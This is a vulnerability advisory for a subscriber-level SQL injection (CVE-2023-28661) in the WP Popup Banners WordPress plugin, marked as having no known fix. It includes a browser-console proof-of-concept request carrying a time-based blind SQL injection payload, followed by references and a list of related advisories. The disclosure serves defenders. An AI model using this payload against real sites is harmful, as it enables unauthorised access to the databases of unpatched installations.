WP Popup Banners <= 1.2.5 – Subscriber+ SQLi | CVE 2023-28661 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the value parameter before using it in a SQL statement via the get_popup_data AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=get_popup_data&value=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

wp-popup-banners

No known fix

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable Research)

Verified

No

WPVDB ID

c3f6770e-de15-41c2-843b-d0ae55ad6418

Timeline

Publicly Published

2023-03-22 (about 2 years ago)

Added

2023-03-23 (about 2 years ago)

Last Updated

2023-03-23 (about 2 years ago)

Other

Published

Title

Published

2022-12-27

Title

WP Statistics < 13.2.9 - Authenticated SQLi

Published

2014-08-01

Title

AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection

Published

2025-07-01

Title

Video List Manager <= 1.7 - Unauthenticated SQL Injection

Published

2023-07-17

Title

MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi

Published

2022-12-05

Title

Contest Gallery < 19.1.5.1 - Unauthenticated SQL Injection